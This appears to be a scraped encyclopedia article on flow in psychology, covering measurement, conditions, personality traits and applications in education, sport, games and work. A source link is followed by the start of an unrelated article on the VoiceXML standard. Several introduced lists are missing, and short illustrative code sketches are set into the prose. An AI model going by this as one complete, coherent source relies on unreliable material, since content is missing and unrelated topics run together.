We have called this state the flow experience, because this is the term many of the people we interviewed had used in their descriptions of how it felt to be in top form: "It was like floating," "I was carried on by the flow."
Mihaly Csikszentmihályi and others began researching flow after Csikszentmihályi became fascinated by artists who would essentially get lost in their work.[8] Artists, especially painters, got so immersed in their work that they would disregard their need for food, water and even sleep. The theory of flow came about when Csikszentmihályi tried to understand the phenomenon experienced by these artists. Flow research became prevalent in the 1980s and 1990s, with Csikszentmihályi and his colleagues in Italy still at the forefront. Researchers grew interested in optimal experiences and emphasizing positive experiences, especially in places such as schools and the business world.[9] They also began studying the theory of flow at this time.[10]
The cognitive science of flow has been studied under the rubric of effortless attention.[11]
Jeanne Nakamura and Csíkszentmihályi identify the following six factors as encompassing an experience of flow:[10]
Those aspects can appear independently of each other, but only in combination do they constitute a so-called flow experience. Additionally, psychology writer Kendra Cherry has mentioned three other components that Csíkszentmihályi lists as being a part of the flow experience:[12]
Just as with the conditions listed above, these conditions can be independent of one another.
In 2021, Cameron Norsworthy and colleagues aimed to address the inconsistencies and concerns of many of the flow-related models and studies, and proposed a framework that differentiated the flow antecedents and experiential dimensions.[13] Norsworthy et al. identified a core experience of flow including overarching antecedent constructs:
And recurring characteristics of the flow experience itself included:
Their proposed definition of flow: an intrinsically rewarding state of absorption in a task in which a high degree of control feels more effortless than normal.
In any given moment, a great deal of information is made available to each individual. Psychologists have found that one's mind can attend to only a certain amount of information at a time. According to Csikszentmihályi's 2004 TED talk, that number is about "110 bits of information per second."[14] That may seem like a lot of information, but simple daily tasks take quite a lot of information. Just decoding speech takes about 40–60 bits of information per second,[15] which is why, when having a conversation, one cannot focus as much attention on other things.[16]
Generally, people have the ability to decide what they will give their full attention to. This excludes basic distinctive feelings, such as hunger and pain. However, when one is in the flow state, they are completely engrossed with the one task at hand and, without making the conscious decision to do so, lose awareness of all other things: time, people, distractions, and even basic bodily needs.[17][18]According to Csikszentmihályi, this event occurs because all of the attention of the person in the flow state is on the task at hand; there is no more attention to be allocated.[19]
The flow state has been described by Csikszentmihályi as the "optimal experience" in that one gets to a level of high gratification from the experience.[20] Achieving this experience is considered to be personal and "depends on the ability" of the individual.[20] One's capacity and desire to overcome challenges in order to achieve their ultimate goals leads not only to the optimal experience but also to a sense of life satisfaction overall.[20]
Despite the attraction of flow and the various flow interventions (e.g., mindfulness, goal-setting, visualisation), no gold-standard intervention to promote flow experiences has existed. Recently, Norsworthy et al. found continued evidence that it may be possible to 'train' flow through an educational intervention.[21][22]
There are three common ways to measure flow experiences: the flow questionnaire (FQ), the experience sampling method (ESM), and the "standardized scales of the componential approach."[23]
The FQ requires individuals to identify definitions of flow and situations in which they believe that they have experienced flow, followed by a section that asks them to evaluate their personal experiences in these flow-inducing situations. The FQ identifies flow as multiple constructs, therefore allowing the results to be used to estimate differences in the likelihood of experiencing flow across a variety of factors. Another strength of the FQ is that it does not assume that everyone's flow experiences are the same. Because of this, the FQ is the ideal measure for estimating the prevalence of flow.[24]However, the FQ has some weaknesses that more recent methods have set out to address. The FQ does not allow for a measurement of the intensity of flow during specific activities. This method also does not measure the influence of the ratio of challenge to skill on the flow state.[23]
The ESM requires individuals to fill out the experience sampling form (ESF) at eight randomly chosen time intervals throughout the day. The purpose of this is to understand subjective experiences by estimating the time intervals that individuals spend in specific states during everyday life. The ESF is made up of 13 categorical items and 29 scaled items. The purpose of the categorical items is to determine the context and motivational aspects of the current actions (these items include: time, location, companionship/desire for companionship, activity being performed, reason for performing activity). Because these are open-ended questions, the answers need to be coded by researchers. This needs to be done carefully so as to avoid any biases in the statistical analysis. The scaled items are intended to measure the levels of a variety of subjective feelings that the individual may be experiencing. The ESM is more complex than the FQ and contributes to the understanding of how flow plays out in a variety of situations; however, the possible biases make it a risky choice.[23]

Some researchers are not satisfied with the methods mentioned above and have set out to create their own scales. The scales developed by Jackson and Eklund are the most commonly used in research, mainly because they are still consistent with Csíkszentmihályi's definition of flow and consider flow as being both a state and a trait. Jackson and Eklund created two scales that have been proven to be psychometrically valid and reliable: the Flow State Scale-2 (which measures flow as a state), and the Dispositional Flow Scale-2 (designed to measure flow as either a general trait or domain-specific trait). The statistical analysis of the individual results from these scales gives a much more complete understanding of flow than the ESM and the FQ.[23] More recently, the Psychological Flow Scale (PFS), designed to be used across domains and scientific disciplines so that future flow research could be compatible and comparable, was validated. It offers a parsimonious model of flow that assesses the core aspects of the flow state.[25]
The flow state can be entered while performing any activity; however, it is more likely to occur when the task or activity is wholeheartedly engaged in for intrinsic purposes.[19][27] Passive activities such as taking a bath or even watching TV usually do not elicit a flow experience, because active engagement is a prerequisite to entering the flow state.[28][29] While the activities that induce flow vary and may be multifaceted, Csikszentmihályi asserts that the experience of flow is similar whatever the activity.[30]
Flow theory postulates that three conditions must be met to achieve flow:
It has been argued that the antecedent factors of flow are interrelated, and as such, a balance between perceived challenges and skills requires that the goals are clear and feedback is effective. Thus, such balance can be identified as the central precondition of flow experience.[32]
In 1987, Massimini, Csíkszentmihályi and Carli published the eight-channel model of flow.[33]Antonella Delle Fave, who worked with Fausto Massimini at the University of Milan, calls this graph the Experience Fluctuation Model.[34]The model depicts the channels of experience that result from different levels of perceived challenges and perceived skills. The graph illustrates another aspect of flow: it is more likely to occur when the activity is a higher-than-average challenge (above the center point) and the individual has above-average skills (to the right of the center point).[19]The center of the graph where the sectors meet represents the average level of challenge and skill across all individual daily activities. The further from the center an experience is, the greater the intensity of that state of being, whether it is flow or anxiety or boredom or relaxation.[27]
Several problems of the model have been discussed in literature.[32][35]One is that it does not ensure the perceived balance between challenges and skills which is said to be the central precondition of flow experience. Individuals with a low average level of skills and a high average level of challenges, (or the converse) do not necessarily experience a match between skills and challenges when both are above their individual average.[36]Another study found that low challenge situations which were surpassed by skill were associated with enjoyment, relaxation, and happiness, which, they claim, is contrary to flow theory.[37]
Schaffer (2013) proposed seven flow conditions:
Schaffer published a flow condition questionnaire (FCQ), to measure each of these seven flow conditions for any given task or activity.[38]
Some of the challenges to staying in flow include states ofapathy,boredom, andanxiety. The state of apathy is characterized by easy challenges and low skill level requirements, resulting in a general lack of interest in the activity. Boredom is a slightly different state that occurs when challenges are few, but one's skill level exceeds those challenges causing one to seek higher challenges. A state of anxiety occurs when challenges are high enough to exceed perceived skill level, causing distress and uneasiness. These states in general prevent achieving the balance necessary for flow.[39]Csíkszentmihályi has said, "If challenges are too low, one gets back to flow by increasing them. If challenges are too great, one can return to the flow state by learning new skills."[12]
Csíkszentmihályi hypothesized that people with certain personality traits may be better able to achieve flow than the average person. These traits include curiosity, persistence, low egotism, and a high propensity to perform activities for intrinsic reasons. People with most of these personality traits are said to have anautotelicpersonality, i.e. a disposition to actively seek challenges and flow experiences.[27][40]The term "autotelic" derives from twoGreekwords,autos("self") andtelos("end" or "goal").
There is scant research on the autotelic personality, but results of the few studies that have been conducted suggest that some people are indeed more likely to experience flow than others. One researcher (Abuhamdeh, 2000) found that people with an autotelic personality have a greater preference for "high-action-opportunity, high-skills situations that stimulate them and encourage growth" compared to those without an autotelic personality.[27] It is in such high-challenge, high-skills situations that people are most likely to experience flow.
Experimental evidence shows that a balance between individual skills and demands of the task (compared to boredom and overload) only elicits the flow experience in individuals having an internal locus of control[41] or a habitual action orientation.[42] Several correlational studies found need for achievement to be a personal characteristic that fosters flow experiences.[43][44][45]
Studies have also shown that flow in personal life correlates with, and overlaps, the Big Five personality traits of extraversion, agreeableness, conscientiousness, neuroticism, and openness to experience, particularly the traits of agreeableness and extraversion. Studying the autotelic personality is difficult because most studies rely on self-evaluation, as an autotelic personality is hard to observe directly.[46][47]
More than one type of flow exists. Group flow (or team flow) is notably different from independent flow, as it is inherently mutual. Group flow is attainable when the performance unit is a group, such as a team or musical ensemble. When groups cooperate to agree on goals and patterns, social flow, commonly known as group cohesion, is much more likely to occur. If a group has still not entered flow, a team-level challenge may stimulate the group to harmonize.[48] Group flow is different from synchronized solitary flow, in which members of a group simultaneously experience individual flow. Group flow occurs in an interpersonal manner, in which the presence of others is inherent to the cause of the state of flow.[49]
A review published in PLOS ONE[49] states, "Group contexts introduce many additional variables that cause individuals to act, think, and feel differently during group situations compared to solitary situations." Due to these additional variables, the causes and effects of group flow differ markedly from those of individual flow, providing evidence for the existence of a separate flow state: group flow.
Snijdewint[50] studied the physiological correlates of groups that simultaneously report a "flow" state. Across many similar studies, this research concludes that when participants report a feeling of flow (in synchronization with, or due to, a group environment), there are similarities in the cardiovascular responses[51] they experience.
Only Csíkszentmihályi seems to have published suggestions for extrinsic applications of the flow concept, such as design methods for playgrounds to elicit the flow experience. Other practitioners of Csíkszentmihályi's flow concept focus on intrinsic applications, such as spirituality, performance improvement, or self-help.
Flow state theory suggests that when individuals are in a state of flow, they experience deep immersion, focus, and intrinsic motivation in their activities.[52] In the context of education, flow has been associated with increased student engagement, which is a key determinant of learning success.
Numerous studies have examined the relationship between flow and student engagement, demonstrating positive associations. For example, Csikszentmihalyi and Larson (1984) found that students who reported experiencing flow during their academic tasks exhibited higher levels of engagement, concentration, and enjoyment. Similarly, Cho and Lee (2017) discovered that flow experiences positively correlated with student engagement in a college classroom setting.[53]
Flow state research has also explored its impact on learning outcomes, such as knowledge acquisition, skill development, and creativity. When students are in a state of flow, they are more likely to experience a heightened sense of focus, concentration, and intrinsic motivation, which can lead to improved learning outcomes.[54]
Studies have shown that flow experiences can enhance cognitive processes related to learning. For instance, Schüler and Brunner (2009) found that university students who reported being in a state of flow while studying demonstrated better information recall and problem-solving abilities. In addition, studies by Simons and Dewitte (2004) and Jackson and Csikszentmihalyi (1999) revealed that flow experiences positively influenced creativity and innovation among students.[citation needed]
The concept of flow has been applied to various educational settings and practices, offering valuable insights for teaching and learning. Here are a few notable applications:
These applications demonstrate the potential benefits of integrating flow state theory into educational practices. However, further research is needed to explore the specific strategies and interventions that effectively foster flow in educational settings.
In education, the concept of overlearning plays a role in a student's ability to achieve flow. Csíkszentmihályi[20] states that overlearning enables the mind to concentrate on visualizing the desired performance as a singular, integrated action instead of a set of actions. Challenging assignments that (slightly) stretch one's skills lead to flow.[59]
In the 1950s, British cybernetician Gordon Pask designed an adaptive teaching machine called SAKI, an early example of "e-learning". The machine is discussed in some detail in Stafford Beer's book Cybernetics and Management.[60] In the patent application for SAKI (1956),[61] Pask's comments (some of which are included below) indicate an awareness of the pedagogical importance of balancing student competence with didactic challenge, which is quite consistent with flow theory:
If the operator is receiving data at too slow a rate, he is likely to become bored and attend to other irrelevant data.
If the data given indicates too precisely what responses the operator is required to make, the skill becomes too easy to perform and the operator again tends to become bored.
If the data given is too complicated or is given at too great a rate, the operator is unable to deal with it. He is then liable to become discouraged and lose interest in performing or learning the skill.
Ideally, for an operator to perform a skill efficiently, the data presented to him should always be of sufficient complexity to maintain his interest and maintain a competitive situation, but not so complex as to discourage the operator. Similarly these conditions should obtain at each stage of a learning process if it is to be efficient. A tutor teaching one pupil seeks to maintain just these conditions.
Around 2000, it came to the attention of Csíkszentmihályi that the principles and practices of the Montessori Method of education seemed to purposefully set up continuous flow opportunities and experiences for students. Csíkszentmihályi and psychologist Kevin Rathunde embarked on a multi-year study of student experiences in Montessori settings and traditional educational settings. The research supported observations that students achieved flow experiences more frequently in Montessori settings.[62][63][64]
Musicians, especially improvisational soloists, may experience a state of flow while playing their instrument.[65] Research has shown that performers in a flow state have a heightened quality of performance as opposed to when they are not in a flow state.[66] In a study performed with professional classical pianists who played piano pieces several times to induce a flow state, a significant relationship was found between the flow state of the pianist and the pianist's heart rate, blood pressure, and major facial muscles. As the pianist entered the flow state, heart rate and blood pressure decreased, and the major facial muscles relaxed. This study further emphasized that flow is a state of effortless attention. In spite of the effortless attention and overall relaxation of the body, the performance of the pianist during the flow state improved.[67]
Groups of drummers go through a state of flow when they sense a collective energy that drives the beat, something they refer to as getting into the groove or entrainment. Likewise, drummers and bass guitarists often describe a state of flow when they are feeling the downbeat together as being in the pocket.[68] Researchers have measured flow through nine subscales: challenge-skill balance, merging of action and awareness, clear goals, unambiguous feedback, total concentration, sense of control, loss of self-consciousness, transformation of time, and autotelic experience.[69]
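A scoring routine for a nine-subscale flow measure like the one listed above could be sketched as follows; the Likert range, item groupings, and simple averaging scheme are assumptions for illustration, not the published scoring manual of any specific instrument:

```python
# Hypothetical scoring sketch for a nine-subscale flow questionnaire.
SUBSCALES = [
    "challenge_skill_balance", "action_awareness_merging", "clear_goals",
    "unambiguous_feedback", "total_concentration", "sense_of_control",
    "loss_of_self_consciousness", "transformation_of_time",
    "autotelic_experience",
]

def score_flow(responses):
    """Average the Likert items (e.g. 1-5) within each subscale, then
    average the subscale means into a single global flow score."""
    scores = {name: sum(items) / len(items)
              for name, items in responses.items()}
    scores["global_flow"] = sum(scores[s] for s in SUBSCALES) / len(SUBSCALES)
    return scores
```

A respondent's answers would be supplied as a dict mapping each subscale name to its list of item ratings.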
The concept of being in the zone during an athletic performance fits within Csíkszentmihályi's description of the flow experience. Theories and applications of being in the zone and its relationship with an athletic competitive advantage are topics studied in the field of sport psychology.[70] In a qualitative study of NCAA Division I athletes on the experience of flow, 94% of the athletes described the flow state as causing a merging of action and awareness, and as effortless and automatic.[71]
Timothy Gallwey's influential works on the "inner game" of sports such as golf and tennis described the mental coaching and attitudes required to "get in the zone" and fully internalize mastery of the sport.[72]
Roy Palmer suggests that "being in the zone" may also influence movement patterns as better integration of the conscious and subconscious reflex functions improves coordination. Many athletes describe the effortless nature of their performance while achieving personal bests.[73][74][75]
Many martial arts, such as Japanese budō, contain aspects of psychological flow.[76] Mixed martial arts champion and Karate master Lyoto Machida uses meditation techniques before fights to attain mushin, a concept that, by his description, is in all respects equal to flow.
The Formula One driver Ayrton Senna, during qualifying for the 1988 Monaco Grand Prix, explained: "I was already on pole, [...] and I just kept going. Suddenly I was nearly two seconds faster than anybody else, including my team mate with the same car. And suddenly I realised that I was no longer driving the car consciously. I was driving it by a kind of instinct, only I was in a different dimension. It was like I was in a tunnel."[77]
Former 500 GP rider Wayne Gardner, talking about his victory at the 1990 Australian Grand Prix in The Unrideables 2 documentary, said: "During these last five laps I had this sort of above body experience where actually raised up above and I could see myself racing. It was kind of a remote control and it's the weirdest thing I've ever had in my life. [...] After the race Mick [Doohan] and in fact Wayne Rainey said: 'How the hell did you do that?' and I said: 'I have no idea.'"[78]
In yogic traditions such as Raja Yoga, reference is made to a state of flow[79] in the practice of Samyama, a psychological absorption in the object of meditation.[80]
Flow in games and gaming has been linked to the laws of learning as a part of the explanation for why learning games (the use of games to introduce material, improve understanding, or increase retention) have the potential to be effective.[81][failed verification] In particular, flow is intrinsically motivating, which is part of the law of readiness. The condition of feedback, required for flow, is associated with the feedback aspects of the law of exercise. This is exhibited in well-designed games, in particular, where players perform at the edge of their competency as they are guided by clear goals and feedback.[82] The positive emotions associated with flow are associated with the law of effect. The intense experiences of being in a state of flow are directly associated with the law of intensity. Thus, the experience of gaming can be so engaging and motivating because it meets many of the laws of learning, which are inextricably connected to creating flow.
In games, much can often be achieved thematically through an imbalance between challenge level and skill level. Horror games often keep challenges significantly above the player's level of competency in order to foster a continual feeling of anxiety. Conversely, so-called "relaxation games" keep the level of challenge significantly below the player's competency level, in order to achieve the opposite effect.[83] The video game Flow was designed as part of Jenova Chen's master's thesis exploring the design decisions that allow players to achieve the flow state, by adjusting the difficulty dynamically during play.[84]
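The dynamic-difficulty idea described above can be sketched as a simple feedback heuristic; the target success rate, step size, and 0-1 difficulty scale here are illustrative assumptions, not any particular game's implementation:

```python
def adjust_difficulty(difficulty, success_rate, target=0.7, step=0.1):
    """Nudge difficulty so the player's recent success rate tracks a
    target, keeping challenge near skill (a common DDA heuristic)."""
    if success_rate > target:
        difficulty += step   # player is coasting: raise the challenge
    elif success_rate < target:
        difficulty -= step   # player is struggling: ease off
    return max(0.0, min(1.0, difficulty))  # clamp to the 0-1 scale
```

A game loop might call this every few encounters with the player's recent win rate; a horror game could instead deliberately hold `difficulty` above the player's level to sustain anxiety.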
Flow can also improve performance; calling the phenomenon "TV trance", a 1981 BYTE article discussed how "the best seem to enter a trance where they play but don't pay attention to the details of the game."[85] The primary goal of games is to create entertainment through intrinsic motivation, which is related to flow; that is, without intrinsic motivation it is virtually impossible to establish flow.[86] Through the balance of skill and challenge, the player's brain is aroused, with attention engaged and motivation high.[82] Thus, the use of flow in games helps foster an enjoyable experience, which in turn increases motivation and draws players to continue playing. As such, game designers strive to integrate flow principles into their projects.[87] Overall, the experience of play in the flow state is fluid and intrinsically psychologically rewarding, independent of scores or in-game successes.[82]
A simplified modification of flow has been combined with the technology acceptance model (TAM) to help guide the design of, and explain the adoption of, intrinsically motivated computer systems. This model, the hedonic-motivation system adoption model (HMSAM), is intended to improve the understanding of hedonic-motivation system (HMS) adoption.[86] HMS are systems used primarily to fulfill users' intrinsic motivations, such as online gaming, virtual worlds, online shopping, learning/education, online dating, digital music repositories, social networking, online pornography, gamified systems, and general gamification. Instead of a minor TAM extension, HMSAM is an HMS-specific system acceptance model based on an alternative theoretical perspective, which is in turn grounded in the flow-based concept of cognitive absorption (CA). HMSAM further builds on van der Heijden's (2004) model of hedonic system adoption[88] by including CA as a key mediator of perceived ease of use (PEOU) and of behavioral intention to use (BIU) hedonic-motivation systems. Typically, models simplistically represent "intrinsic motivations" by mere perceived enjoyment. Instead, HMSAM uses the more complex, richer construct of CA, which includes joy, control, curiosity, focused immersion, and temporal dissociation. CA is a construct grounded in the seminal flow literature, yet CA has traditionally been used as a static construct, as if all five of its subconstructs occur at the same time, in direct contradiction to the flow literature. Thus, part of HMSAM's contribution is to return CA closer to its flow roots by re-ordering these CA subconstructs into a more natural process-variance order, as predicted by flow. Empirical data collection along with mediation tests further support this modeling approach.
Conditions of flow, defined as a state in which challenges and skills are equally matched, play an important role in the workplace.[89] Because flow is associated with achievement, its development may have specific implications for increased workplace satisfaction and achievement. Flow researchers, such as Csikszentmihályi, believe that certain interventions may be performed to enhance and increase flow in the workplace, through which people would gain "intrinsic rewards that encourage persistence" and provide benefits. In his consultation work, Csikszentmihályi emphasizes finding activities and environments that are conducive to flow, and then identifying and developing personal characteristics to increase experiences of flow. Applying these methods in the workplace can improve morale by fostering a sense of greater happiness and accomplishment, which may be correlated with increased performance. In his review of Mihály Csikszentmihályi's book "Good Business: Leadership, Flow, and the Making of Meaning," Coert Visser introduces the ideas presented by Csikszentmihályi, including "good work" in which one "enjoys doing your best while at the same time contributing to something beyond yourself."[90] He then provides tools by which managers and employees can create an atmosphere that encourages good work. Some consultants suggest that the experience sampling method (ESM) be used for individuals and teams in the workplace in order to identify how time is currently being spent and where focus should be redirected in order to maximize flow experiences.[91]
In order to achieve flow, Csikszentmihályi lays out the following three conditions: the activity must have clear goals, it must provide immediate feedback, and there must be a balance between the perceived challenges of the task and one's perceived skills.
Csikszentmihályi argues that with increased experiences of flow, people experience "growth towards complexity". People flourish as their achievements grow, and with that comes the development of increasing "emotional, cognitive, and social complexity."[90] Creating a workplace atmosphere that allows for flow and growth, Csikszentmihályi argues, can increase the happiness and achievement of employees. An increasingly popular way of promoting greater flow in the workplace is the use of "serious play" facilitation methods.[citation needed]
In the study "Predicting flow at work: Investigating the activities and job characteristics that predict flow states at work", Karina Nielsen and Bryan Cleal used a 9-item flow scale to examine predictors of flow at two levels: the activity level (such as brainstorming, problem solving, and evaluation) and a more stable level (such as role clarity, influence, and cognitive demands). They found that activities such as planning, problem solving, and evaluation predicted transient flow states, but that more stable job characteristics did not predict flow at work. This study can help identify which tasks at work can be cultivated and emphasized in order to help employees experience flow on the job.[92] In her article in Positive Psychology News Daily, Kathryn Britton examines the importance of experiencing flow in the workplace beyond the individual benefits it creates. She writes, "Flow isn't just valuable to individuals; it also contributes to organizational goals. For example, frequent experiences of flow at work lead to higher productivity, innovation, and employee development (Csikszentmihályi, 1991, 2004). So finding ways to increase the frequency of flow experiences can be one way for people to work together to increase the effectiveness of their workplaces."[93]
Books by Csikszentmihályi suggest that increasing the time spent in flow makes our lives happier and more successful. Flow experiences are predicted to lead to positive affect as well as to better performance.[20][94] For example, delinquent behavior was reduced in adolescents after two years of enhancing flow through activities.[39]
People who have experienced flow describe the following feelings:
However, further empirical evidence is required[according to whom?] to substantiate these preliminary indications, as flow researchers continue to explore the problem of how to directly investigate causal consequences of flow experiences using modern scientific instrumentation to observe the neuro-physiological correlates of the flow state.[96]
Flow is an innately positive experience known to "produce intense feelings of enjoyment".[19] An experience that is so enjoyable should lead to positive affect and happiness in the long run. Also, Csikszentmihályi stated that happiness is derived from personal development and growth, and flow situations permit the experience of personal development.[94]
Several studies found that flow experiences and positive affect go hand in hand,[44][97] and that challenges and skills above the individual's average foster positive affect.[98][99][100] However, the causal processes underlying those relationships remain unclear at present.
Flow experiences imply a growth principle. When one is in a flow state, one is working to master the activity at hand. To maintain that flow state, one must seek increasingly greater challenges. Attempting these new, difficult challenges stretches one's skills. One emerges from such a flow experience with a bit of personal growth and great "feelings of competence and efficacy".[31] By increasing time spent in flow, intrinsic motivation and self-directed learning also increase.[101]
Flow has a documented correlation with high performance in the fields of artistic and scientific creativity,[102][103] teaching,[94] learning,[104] and sports.[105][106] On the sports side, researchers at Alexandria University in Egypt investigated whether a flow state can help in learning different techniques. Their research involved 24 students, aged 19-20, who were novices at tennis and field hockey.[107] The experiment put the students through a process of mental training in which they watched clips of athletes in slow motion.[107] This took place over 16 sessions, split into 8 sessions for each sport, each lasting 40 minutes, 3 times a week, alternating sports every session.[107] The reliability of the experiment was shown to be very good, and the results indicated that the participants were able to perform at a higher level than they would have without the mental training and relaxation.[107] A spike in performance was observed specifically in the forehand and backhand in tennis and the push pass in field hockey.[107]
Flow has been linked to persistence and achievement in activities, while also helping to lower anxiety during various activities and raise self-esteem.[39] An article produced by José A. Domínguez-González, Rafael E. Reigal, Verónica Morales-Sánchez, and Antonio Hernández-Mendo at the University of Málaga in Spain shows further benefits of the flow state in young football (soccer) players. The experiment, which was questionnaire-based, examined whether there was a "correlation between sports psychological profile, competitive anxiety, self-confidence and the flow state."[108] The sample of 328 people was split into two groups: the first contained 172 people and the second 156, with mean ages of 14.72 and 17.11 respectively.[108] The first group also played in higher-status leagues, while the second group largely played in lower-status leagues.[108] The study concluded that, on average, athletes with high skill had less anxiety and a higher sports psychological profile, self-confidence, and flow state than athletes in the lower leagues.[108] It also showed a positive correlation between sports psychological profile and both self-confidence and the flow state,[108] and a negative correlation between competitive anxiety and sports psychological profile, self-confidence, and the flow state.[108]
However, evidence regarding better performance in flow situations is mixed.[96] The association between the two is certainly reciprocal: flow experiences may foster better performance but, on the other hand, good performance makes flow experiences more likely. Results of a longitudinal study in the academic context indicate that the causal effect of flow on performance is only of small magnitude and that the strong relationship between the two is driven by an effect of performance on flow.[43] In the long run, flow experiences in a specific activity may lead to higher performance in that activity, as flow is positively correlated with a higher subsequent motivation to perform and to perform well.[31]
Research on flow experiences is well established; however, there remain unresolved, critical issues with the universal definitions and measurements associated with the concept.[109] In recent years, the language, definitions, measurement approaches, and models of flow state in the research community have continually multiplied. A comprehensive review of flow state studies conducted from 2012 to 2019 took one of the first steps towards determining a potential universalization of terminology for future flow research.[110] Despite the varied approaches to flow evident in this review, a common set of overarching antecedent constructs included "optimal challenge" and "high motivation," and recurring characteristics of the flow experience itself included "absorption," "effortless control," and "intrinsic reward." By separating the antecedents of flow from the experience of flow itself, and utilising language accessible to all scientific disciplines, Norsworthy et al.'s three-dimensional conceptualisation of flow offers a contemporary framework for the study of flow across scientific disciplines.
Psychological flow state research has made significant strides in understanding the concept and its implications. However, like any scientific field, it is not without its criticisms and areas that require further investigation.
This section explores the criticisms of flow state research and highlights the potential directions for future research.
The lack of standardized definitions, measurement approaches, and terminologies hampers the cumulative progress of flow state research and poses challenges in synthesizing and comparing findings across studies.[113] It also limits the development of comprehensive theoretical models that can encompass the complexity and nuances of flow experiences. Addressing these critical issues is essential to enhance the scientific rigor and validity of flow state research, enabling a deeper understanding of this intriguing psychological phenomenon. Despite these criticisms and challenges, the study of flow states continues to evolve and expand. Researchers are actively working towards refining the conceptualization, measurement, and theoretical frameworks of flow. Through ongoing efforts to establish consensus and develop standardized guidelines, the field aims to overcome these limitations, paving the way for more robust and comprehensive investigations into the nature and significance of psychological flow states.[114]
Csikszentmihályi writes about the dangers of flow himself:
...enjoyable activities that produce flow have a potentially negative effect: while they are capable of improving the quality of existence by creating order in the mind, they can become addictive, at which point the self becomes captive of a certain kind of order, and is then unwilling to cope with the ambiguities of life.
Further, he writes:
The flow experience, like everything else, is not "good" in an absolute sense. It is good only in that it has the potential to make life more rich, intense, and meaningful; it is good because it increases the strengths and complexity of the self. But whether the consequence of any particular instance of flow is good in a larger sense needs to be discussed and evaluated in terms of more inclusive social criteria.[115]
Keller and Landhäußer (2012, p. 56) advocate for a flow intensity model because many models of flow have trouble predicting the intensity of flow experiences that can occur under various circumstances where skill and task demands fit together to produce flow.[32]
Cowley et al. found that because self-reported flow happens after-the-fact, it does not really capture the aspect of flow that happens in the moment. Furthermore, that aspect of flow is prone to change, so the self-reported experience of flow cannot be trusted as much.[116]
Cameron et al. found that there is not a lot of information on group flow, and this may be hindering development in managerial and theoretical contributions.[117]
Goddard et al. found that interventions such as hypnosis, mindfulness, and imagery did not reliably trigger flow experiences in individuals, although these strategies were found to increase the intensity of the flow state.[118]
Braxton Soderman's 2021 monographAgainst Flow: Video Games and the Flowing Subjectpoints out that flow exists on ideological grounds as an individualist counterpoint to socialism. Furthermore, the application of flow via gamification has brought work and play into ever closer relationship. Play is, therefore, converted into a form of unpaid labor.[119]
Norsworthy et al. proposed a parsimonious model of three core dimensions of flow, reflecting the findings from the largest review of flow science to date, synthesising flow research across scientific disciplines and addressing conceptual criticisms of flow science regarding construct validity, theoretical compatibility, relational ambiguity, and definitional inconsistency. They also validated a new Psychological Flow Scale (PFS) to measure the core aspects of the flow state, usable across domains and scientific disciplines.[120]
In a global context, there is a gap in understanding how flow manifests within various socio-cultural contexts. Cross-cultural comparative studies, as suggested by Engeser and Rheinberg (2008), could delve into how flow experiences differ across societies, deepening our understanding of the concept's universality or cultural specificity.[121]
Longitudinal studies, capable of tracking flow experiences over extended periods, could offer insights into the sustained effects of flow on personal development, well-being, and performance. As Seligman and Csikszentmihalyi (2000) have suggested, such research could offer a more nuanced understanding of the concept's long-term impact.[122]
The impact of technological advancements on flow experiences represents another noteworthy research direction. As digital technology increasingly permeates our lives, exploring how immersive technologies such as virtual reality or augmented reality facilitate or hinder flow states could be an enlightening line of study. The potential of such research has been discussed by Csikszentmihalyi and Csikszentmihalyi (2014), emphasizing the need to understand how digital distractions may disrupt flow and how these effects could be mitigated. Another critical avenue for future research is the role of flow in online learning. The rise of digital education platforms, as discussed by Csíkszentmihályi and Nakamura (2018), necessitates investigations into how flow can be fostered in these contexts and how it might influence learning outcomes.[123]
The neuroscientific underpinnings of flow are a developing field with significant potential. With advancements in neuroimaging technologies, as highlighted by Linden (2021), the opportunity to correlate psychological experiences of flow with their physiological counterparts becomes increasingly feasible.[124]
Additional research into how flow impacts ethical decision-making across professional fields could have extensive implications. An exploratory study by Nielsen and Cleal (2010) hints at the potential role of flow in influencing ethical judgments, suggesting the necessity of more extensive research in this domain.[125]
Cameron et al. proposed a research program that focuses on how group flow differs from individual flow, and how group flow affects group performance. These ideas will address some of the issues in group flow research, such as poor data collection and interpretation.[126] Sridhar & Lyngdoh suggested that research should investigate how mobility affects the ethical performance of sales professionals. Furthermore, longitudinal studies should be done in various fields to understand the ethical implications of flow in sales.[127]
https://en.wikipedia.org/wiki/Flow_(psychology)
VoiceXML (VXML) is a digital document standard for specifying interactive media and voice dialogs between humans and computers. It is used for developing audio and voice response applications, such as banking systems and automated customer service portals. VoiceXML applications are developed and deployed in a manner analogous to how a web browser interprets and visually renders the Hypertext Markup Language (HTML) it receives from a web server. VoiceXML documents are interpreted by a voice browser and in common deployment architectures, users interact with voice browsers via the public switched telephone network (PSTN).
The VoiceXML document format is based on Extensible Markup Language (XML). It is a standard developed by the World Wide Web Consortium (W3C).
VoiceXML applications are commonly used in many industries and segments of commerce. These applications include order inquiry, package tracking, driving directions, emergency notification, wake-up, flight tracking, voice access to email, customer relationship management, prescription refilling, audio news magazines, voice dialing, real-estate information and national directory assistance applications.[citation needed]
VoiceXML has tags that instruct the voice browser to provide speech synthesis, automatic speech recognition, dialog management, and audio playback. The following is an example of a VoiceXML document:
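A minimal "Hello world" document, following the structure defined in the VoiceXML 2.0 specification, looks like this:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<vxml xmlns="http://www.w3.org/2001/vxml" version="2.0">
  <form>
    <block>
      <!-- The prompt element's text is rendered with synthesized speech. -->
      <prompt>Hello world</prompt>
    </block>
  </form>
</vxml>
```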
When interpreted by a VoiceXML interpreter this will output "Hello world" with synthesized speech.
Typically, HTTP is used as the transport protocol for fetching VoiceXML pages. Some applications may use static VoiceXML pages, while others rely on dynamic VoiceXML page generation using an application server like Tomcat, WebLogic, IIS, or WebSphere.
Historically, VoiceXML platform vendors have implemented the standard in different ways, and added proprietary features. But the VoiceXML 2.0 standard, adopted as a W3C Recommendation on 16 March 2004, clarified most areas of difference. The VoiceXML Forum, an industry group promoting the use of the standard, provides a conformance testing process that certifies vendors' implementations as conformant.
AT&T Corporation, IBM, Lucent, and Motorola formed the VoiceXML Forum in March 1999, in order to develop a standard markup language for specifying voice dialogs. By September 1999 the Forum released VoiceXML 0.9 for member comment, and in March 2000 they published VoiceXML 1.0. Soon afterwards, the Forum turned over the control of the standard to the W3C.[1] The W3C produced several intermediate versions of VoiceXML 2.0, which reached the final "Recommendation" stage in March 2004.[2]
VoiceXML 2.1 added a relatively small set of additional features to VoiceXML 2.0, based on feedback from implementations of the 2.0 standard. It is backward compatible with VoiceXML 2.0 and reached W3C Recommendation status in June 2007.[3]
